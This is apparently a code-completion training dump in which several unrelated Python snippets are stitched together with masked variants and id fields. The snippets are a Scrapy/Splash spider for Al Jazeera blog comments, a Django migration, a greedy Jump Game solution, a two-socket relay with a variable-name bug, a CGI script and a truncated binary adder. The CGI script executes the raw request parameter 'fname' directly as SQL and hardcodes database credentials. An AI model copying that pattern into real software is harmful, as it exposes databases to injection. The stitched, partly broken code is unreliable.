\"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = ''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n 
comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-2": "<mask token>\n\n\nclass Blogsaljazeera2Spider(Spider):\n <mask token>\n <mask token>\n <mask token>\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").\n extract_first()) / 6) + 1\n yield SplashRequest(url=response.urljoin(''), callback=self.\n parse_comment, endpoint='execute', args={'lua_source': self.\n lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n \"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = ''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in 
get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-3": "<mask token>\n\n\nclass Blogsaljazeera2Spider(Spider):\n name = 'blogsaljazeera2'\n allowed_domains = ['blogs.aljazeera.net']\n start_urls = ['http://blogs.aljazeera.net/topics/short']\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").\n extract_first()) / 6) + 1\n yield SplashRequest(url=response.urljoin(''), callback=self.\n parse_comment, endpoint='execute', args={'lua_source': self.\n lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n \"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = ''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n 
description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-4": "from __future__ import unicode_literals\nimport re\nimport arabic_reshaper\nfrom scrapy import Spider, Request\nfrom bidi.algorithm import get_display\nfrom websites.items import ArticleItem\nfrom operator import add\nfrom scrapy_splash import SplashRequest\n\n\nclass Blogsaljazeera2Spider(Spider):\n name = 'blogsaljazeera2'\n allowed_domains = ['blogs.aljazeera.net']\n start_urls = ['http://blogs.aljazeera.net/topics/short']\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").\n extract_first()) / 6) + 1\n yield SplashRequest(url=response.urljoin(''), callback=self.\n parse_comment, endpoint='execute', args={'lua_source': self.\n lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n \"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = 
''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport re\nimport arabic_reshaper\nfrom scrapy import Spider, Request\nfrom bidi.algorithm import get_display\nfrom websites.items import ArticleItem\nfrom operator import add\nfrom scrapy_splash import SplashRequest\n\n\nclass Blogsaljazeera2Spider(Spider):\n name = 'blogsaljazeera2'\n allowed_domains = ['blogs.aljazeera.net']\n start_urls = ['http://blogs.aljazeera.net/topics/short']\n\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\".format(n, \"{html=splash:html()}\")\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {\n 'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute',\n }\n })\n\n def parse_result(self, response):\n for link in response.xpath(\"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links, dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").extract_first())/6)+1\n yield SplashRequest(url=response.urljoin(''), callback=self.parse_comment, endpoint='execute', args={'lua_source': self.lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n\n title = \"\"\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath(\"//h1[@class='tweet_strip_text']/text()\").extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"title\"] = title\n\n 
author = \"\"\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath(\"null\").extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"author\"] = author\n\n item[\"link\"] = response.url\n\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath(\"null\").extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"description\"] = description\n\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath(\"//article/p/text()\").extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath(\"//article/div/div/h2/text()\").extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"comments\"] = comment\n item[\"names\"] = names\n item[\"feedbacks\"] = feeds\n\n return item\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
# Generated by Django 3.1.1 on 2020-10-07 04:04
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add an optional thumbnail image field to the Artical model."""

    dependencies = [('articals', '0001_initial')]

    operations = [
        migrations.AddField(
            model_name='artical',
            name='thumb',
            field=models.ImageField(
                blank=True,
                default='default.png',
                upload_to='media/',
            ),
        ),
    ]
|
normal
|
{
"blob_id": "d69bffb85d81ab3969bfe7dfe2759fa809890208",
"index": 503,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('articals', '0001_initial')]\n operations = [migrations.AddField(model_name='artical', name='thumb',\n field=models.ImageField(blank=True, default='default.png',\n upload_to='media/'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('articals', '0001_initial')]\n operations = [migrations.AddField(model_name='artical', name='thumb',\n field=models.ImageField(blank=True, default='default.png',\n upload_to='media/'))]\n",
"step-5": "# Generated by Django 3.1.1 on 2020-10-07 04:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articals', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='artical',\n name='thumb',\n field=models.ImageField(blank=True, default='default.png', upload_to='media/'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Greedy Algorithm solves a problem by building a solution incrementally
# The algorithm is greedy because it chooses the next step that gives the most benefit
# Can save a lot of time when used correctly since they don't have to look at the entire problem space
# It's either the most optimal solution or it doesn't work at all, so you have to know for sure when to use it
# It's a short-sighted algorithm since we are only looking to optimize the input, not the entire solution
# Problem 1 JUMP GAME
# given an array of non-negative integers, we are starting at the first index of the array
# each element in the array represents our maximum jump length at that position
# determine if we can reach the last index
# this stands out as a greedy algorithm
#ex. [2,3,1,1,4]
# true since we can go from 2 to 3 to 4, or 2 to 1 to 1 to 4
class Solution:
    # Greedy reachability check for the Jump Game problem.
    # Time: O(n) single pass; Space: O(1).
    def canJump(self, nums):
        """Return True if the last index of *nums* is reachable from index 0.

        Each element is the maximum jump length from that position; we
        track the furthest index reachable so far and fail as soon as the
        current position lies beyond it.
        """
        furthest = 0
        for position, jump in enumerate(nums):
            # A position past our furthest reach can never be visited.
            if position > furthest:
                return False
            furthest = max(furthest, position + jump)
        return True
if __name__ == "__main__":
    # Quick smoke run with the canonical example from the problem statement.
    solver = Solution()
    print(solver.canJump([2, 3, 1, 1, 4]))
|
normal
|
{
"blob_id": "f6974c0e5908710031bc3c3bb75c277be426632c",
"index": 2789,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Solution:\n\n def canJump(self, nums):\n best_index = 0\n for i in range(len(nums)):\n if i > best_index:\n return False\n best_index = max(best_index, nums[i] + i)\n return True\n\n\n<mask token>\n",
"step-4": "class Solution:\n\n def canJump(self, nums):\n best_index = 0\n for i in range(len(nums)):\n if i > best_index:\n return False\n best_index = max(best_index, nums[i] + i)\n return True\n\n\nif __name__ == '__main__':\n ok = Solution()\n ans = ok.canJump([2, 3, 1, 1, 4])\n print(ans)\n",
"step-5": "# Greedy Algorithm solves a problem by building a solution incrementally\n# The algorithm is greedy because it chooses the next step that gives the most benefit\n# Can save a lot of time when used correctly since they don't have to look at the entire problem space\n# It's either the most optimal solution or it doesn't work at all, so you have to know for sure when to use it\n# It's a short-sighted algorithm since we are only looking to optimize the input, not the entire solution\n\n# Problem 1 JUMP GAME\n\n# given an array of non-negative integers, we are starting at the first index of the array\n# each element in the array represents our maximum jump length at that position\n# determine if we can reach the last index\n# this stands out as a greedy algorithm\n\n#ex. [2,3,1,1,4]\n# true since we can go from 2 to 3 to 4, or 2 to 1 to 1 to 4\n\nclass Solution:\n #O(n) runtime b/c iterating through array\n #O(1) SC b/c no extra space taken up\n def canJump(self, nums):\n best_index = 0\n # for each index in the array\n for i in range(len(nums)):\n # if the current index is greater than the best index\n if i > best_index:\n return False\n # the best index will become the maximum between the best index and the number at the current index + the current index\n best_index = max(best_index, nums[i] + i)\n return True\n\nif __name__ == \"__main__\":\n ok = Solution()\n ans = ok.canJump([2,3,1,1,4])\n print(ans)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
comms_socket1.bind(('120.79.26.97', 55000))
comms_socket2.bind(('120.79.26.97', 55001))
comms_socket1.listen()
<|reserved_special_token_0|>
comms_socket2.listen()
<|reserved_special_token_0|>
while True:
send_date = user1.recv(4096).decode('UTF-8')
user2.send(bytes(send_data, 'UTF-8'))
send_date = user2.recv(4096).decode('UTF-8')
user1.send(bytes(send_data, 'UTF-8'))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
comms_socket1 = socket.socket()
comms_socket2 = socket.socket()
comms_socket1.bind(('120.79.26.97', 55000))
comms_socket2.bind(('120.79.26.97', 55001))
comms_socket1.listen()
user1, address1 = comms_socket1.accept()
comms_socket2.listen()
user2, address2 = comms_socket2.accept()
while True:
send_date = user1.recv(4096).decode('UTF-8')
user2.send(bytes(send_data, 'UTF-8'))
send_date = user2.recv(4096).decode('UTF-8')
user1.send(bytes(send_data, 'UTF-8'))
<|reserved_special_token_1|>
import socket
comms_socket1 = socket.socket()
comms_socket2 = socket.socket()
comms_socket1.bind(('120.79.26.97', 55000))
comms_socket2.bind(('120.79.26.97', 55001))
comms_socket1.listen()
user1, address1 = comms_socket1.accept()
comms_socket2.listen()
user2, address2 = comms_socket2.accept()
while True:
send_date = user1.recv(4096).decode('UTF-8')
user2.send(bytes(send_data, 'UTF-8'))
send_date = user2.recv(4096).decode('UTF-8')
user1.send(bytes(send_data, 'UTF-8'))
<|reserved_special_token_1|>
import socket

# Two-client TCP relay: accepts one connection on each listening socket,
# then forwards each client's messages to the other, 4 KiB at a time.
comms_socket1 = socket.socket()
comms_socket2 = socket.socket()
comms_socket1.bind(("120.79.26.97", 55000))
comms_socket2.bind(("120.79.26.97", 55001))
comms_socket1.listen()
user1, address1 = comms_socket1.accept()
comms_socket2.listen()
user2, address2 = comms_socket2.accept()

while True:
    # BUG FIX: the payload was stored in a misspelled name `send_date`
    # while the send calls referenced the undefined `send_data`, which
    # raised NameError on the first message. One consistent name is used.
    send_data = user1.recv(4096).decode("UTF-8")
    user2.send(bytes(send_data, "UTF-8"))
    send_data = user2.recv(4096).decode("UTF-8")
    user1.send(bytes(send_data, "UTF-8"))
|
flexible
|
{
"blob_id": "8981d53641d22430efb2dd43401fab562b8a95ed",
"index": 3262,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncomms_socket1.bind(('120.79.26.97', 55000))\ncomms_socket2.bind(('120.79.26.97', 55001))\ncomms_socket1.listen()\n<mask token>\ncomms_socket2.listen()\n<mask token>\nwhile True:\n send_date = user1.recv(4096).decode('UTF-8')\n user2.send(bytes(send_data, 'UTF-8'))\n send_date = user2.recv(4096).decode('UTF-8')\n user1.send(bytes(send_data, 'UTF-8'))\n",
"step-3": "<mask token>\ncomms_socket1 = socket.socket()\ncomms_socket2 = socket.socket()\ncomms_socket1.bind(('120.79.26.97', 55000))\ncomms_socket2.bind(('120.79.26.97', 55001))\ncomms_socket1.listen()\nuser1, address1 = comms_socket1.accept()\ncomms_socket2.listen()\nuser2, address2 = comms_socket2.accept()\nwhile True:\n send_date = user1.recv(4096).decode('UTF-8')\n user2.send(bytes(send_data, 'UTF-8'))\n send_date = user2.recv(4096).decode('UTF-8')\n user1.send(bytes(send_data, 'UTF-8'))\n",
"step-4": "import socket\ncomms_socket1 = socket.socket()\ncomms_socket2 = socket.socket()\ncomms_socket1.bind(('120.79.26.97', 55000))\ncomms_socket2.bind(('120.79.26.97', 55001))\ncomms_socket1.listen()\nuser1, address1 = comms_socket1.accept()\ncomms_socket2.listen()\nuser2, address2 = comms_socket2.accept()\nwhile True:\n send_date = user1.recv(4096).decode('UTF-8')\n user2.send(bytes(send_data, 'UTF-8'))\n send_date = user2.recv(4096).decode('UTF-8')\n user1.send(bytes(send_data, 'UTF-8'))\n",
"step-5": "import socket\n\ncomms_socket1 = socket.socket()\ncomms_socket2 = socket.socket()\ncomms_socket1.bind((\"120.79.26.97\",55000))\ncomms_socket2.bind((\"120.79.26.97\",55001))\ncomms_socket1.listen()\nuser1,address1 = comms_socket1.accept()\ncomms_socket2.listen()\nuser2,address2 = comms_socket2.accept()\n\nwhile True:\n send_date = user1.recv(4096).decode(\"UTF-8\")\n user2.send(bytes(send_data,\"UTF-8\"))\n send_date = user2.recv(4096).decode(\"UTF-8\")\n user1.send(bytes(send_data,\"UTF-8\"))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!C:/Users/Tarang/AppData/Local/Programs/Python/Python37-32/python.exe -u
# CGI endpoint: reads the 'fname' request parameter, runs it against a
# local MySQL database, and echoes the fetched rows back in the response.
# Emit the CGI response header before any body output.
print("Content-Type: text/html")
print()
import cgi,cgitb
cgitb.enable() #for debugging: renders tracebacks as HTML in the response
form = cgi.FieldStorage()
# SECURITY: 'fname' comes straight from the HTTP request and is untrusted.
name = form.getvalue('fname')
print("Name of the user is:",name)
import pymysql
# NOTE(review): database credentials are hardcoded in source — consider
# loading them from configuration or environment variables.
db = pymysql.connect("localhost","root","Manchesterutd20","sts" )
cursor = db.cursor()
# SECURITY: this executes the raw request parameter as SQL, so the client
# controls the entire statement (SQL injection by construction). If a
# specific query is intended, use a fixed statement with bound
# parameters, e.g. cursor.execute("SELECT ... WHERE name = %s", (name,)).
cursor.execute(name)
# `name` is rebound from the query text to the fetched result rows.
name = cursor.fetchall()
print (name)
db.close()
|
normal
|
{
"blob_id": "cb28e8bb98cbeed0b703fbfcf7cf30ebca52aa25",
"index": 4247,
"step-1": "<mask token>\n",
"step-2": "print('Content-Type: text/html')\nprint()\n<mask token>\ncgitb.enable()\n<mask token>\nprint('Name of the user is:', name)\n<mask token>\ncursor.execute(name)\n<mask token>\nprint(name)\ndb.close()\n",
"step-3": "print('Content-Type: text/html')\nprint()\n<mask token>\ncgitb.enable()\nform = cgi.FieldStorage()\nname = form.getvalue('fname')\nprint('Name of the user is:', name)\n<mask token>\ndb = pymysql.connect('localhost', 'root', 'Manchesterutd20', 'sts')\ncursor = db.cursor()\ncursor.execute(name)\nname = cursor.fetchall()\nprint(name)\ndb.close()\n",
"step-4": "print('Content-Type: text/html')\nprint()\nimport cgi, cgitb\ncgitb.enable()\nform = cgi.FieldStorage()\nname = form.getvalue('fname')\nprint('Name of the user is:', name)\nimport pymysql\ndb = pymysql.connect('localhost', 'root', 'Manchesterutd20', 'sts')\ncursor = db.cursor()\ncursor.execute(name)\nname = cursor.fetchall()\nprint(name)\ndb.close()\n",
"step-5": "#!C:/Users/Tarang/AppData/Local/Programs/Python/Python37-32/python.exe -u\r\nprint(\"Content-Type: text/html\")\r\nprint()\r\n\r\nimport cgi,cgitb\r\ncgitb.enable() #for debugging\r\nform = cgi.FieldStorage()\r\nname = form.getvalue('fname')\r\nprint(\"Name of the user is:\",name)\r\n\r\nimport pymysql\r\n\r\ndb = pymysql.connect(\"localhost\",\"root\",\"Manchesterutd20\",\"sts\" )\r\n\r\ncursor = db.cursor()\r\n\r\ncursor.execute(name)\r\n\r\nname = cursor.fetchall()\r\n\r\nprint (name)\r\n\r\ndb.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
""" binary_adder.py: Takes two arrays representing binary numbers,
adds them together. """
__author__ = "David Vaillant"
__credits__ = "CLRS, Chapter 2.1"
def binary_add(x, y):
    """ Adds two binary arrays together.

    Both arrays are most-significant-bit first and must have equal
    length.  Returns the (len+1)-element sum array, ``None`` when the
    lengths differ, or ``False`` when a non-binary digit is found.
    """
    # The unit tests in this file expect None (not an AssertionError) for
    # mismatched lengths; `assert` is also stripped under -O, so it is
    # unsuitable for input validation.
    if len(x) != len(y):
        return None

    # z holds the result least-significant-digit first, with one extra
    # slot for a final carry.
    z = [0] * (len(x) + 1)
    for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):
        # Reject anything that is not a binary digit.
        if i not in (0, 1) or j not in (0, 1):
            return False

        # Column sum: incoming carry (already in z[a]) plus both digits,
        # then normalize by propagating a carry when the column reaches 2.
        z[a] += i + j
        if z[a] >= 2:
            z[a + 1] += 1
            z[a] -= 2

    return z[::-1]
def unit_test():
    """ Unit tests. """
    # (x, y, expected) triples; expected None marks an invalid-input case.
    cases = [
        ([1, 0, 0],       [0, 1, 1],       [0, 1, 1, 1]),
        ([1],             [0],             [0, 1]),
        ([0],             [0, 0],          None),
        ([1, 0, 0, 1],    [1, 1, 0, 0],    [1, 0, 1, 0, 1]),
        ([1, 1, 1, 1],    [0, 0, 0, 0],    [0, 1, 1, 1, 1]),
        ([1, 0, 0, 0, 0], [1, 0, 0, 0, 0], [1, 0, 0, 0, 0, 0]),
    ]
    for x, y, expected in cases:
        sum = binary_add(x, y)
        print("Adding {} to {}.".format(x, y))
        if sum == expected:
            print("Successfully returned {}.".format(sum))
        else:
            print("Got {} instead of {}.".format(sum, expected))
        print()
# Run the self-checks when executed as a script (not on import).
if __name__ == "__main__":
    unit_test()
|
normal
|
{
"blob_id": "40aa9e7cf0aaca24054297ca80aaf468ba485966",
"index": 5621,
"step-1": "<mask token>\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = [1, 0, 0], [1], [0], [1, 0, 0, 1], [1, 1, 1, 1], [1, 0, 0, 0, 0]\n y_arr = [0, 1, 1], [0], [0, 0], [1, 1, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0, 0]\n z_arr = [0, 1, 1, 1], [0, 1], None, [1, 0, 1, 0, 1], [0, 1, 1, 1, 1], [\n 1, 0, 0, 0, 0, 0]\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print('Adding {} to {}.'.format(x, y))\n if sum == z_arr[a]:\n print('Successfully returned {}.'.format(sum))\n else:\n print('Got {} instead of {}.'.format(sum, z_arr[a]))\n print()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef binary_add(x, y):\n \"\"\" Adds two binary arrays together. \"\"\"\n assert len(x) == len(y)\n z = [0] * (len(x) + 1)\n for a, (i, j) in enumerate(zip(x[::-1], y[::-1])):\n if i not in [0, 1]:\n return False\n if j not in [0, 1]:\n return False\n if i and j:\n z[a] += 0\n z[a + 1] += 1\n elif i or j:\n z[a] += 1\n else:\n pass\n if z[a] == 2:\n z[a + 1] += 1\n z[a] -= 2\n return z[::-1]\n\n\ndef unit_test():\n \"\"\" Unit tests. \"\"\"\n x_arr = [1, 0, 0], [1], [0], [1, 0, 0, 1], [1, 1, 1, 1], [1, 0, 0, 0, 0]\n y_arr = [0, 1, 1], [0], [0, 0], [1, 1, 0, 0], [0, 0, 0, 0], [1, 0, 0, 0, 0]\n z_arr = [0, 1, 1, 1], [0, 1], None, [1, 0, 1, 0, 1], [0, 1, 1, 1, 1], [\n 1, 0, 0, 0, 0, 0]\n for a, (x, y) in enumerate(zip(x_arr, y_arr)):\n sum = binary_add(x, y)\n print('Adding {} to {}.'.format(x, y))\n if sum == z_arr[a]:\n print('Successfully returned {}.'.format(sum))\n else:\n print('Got {} instead of {}.'.format(sum, z_arr[a]))\n print()\n\n\nif __name__ == '__main__':\n unit_test()\n",
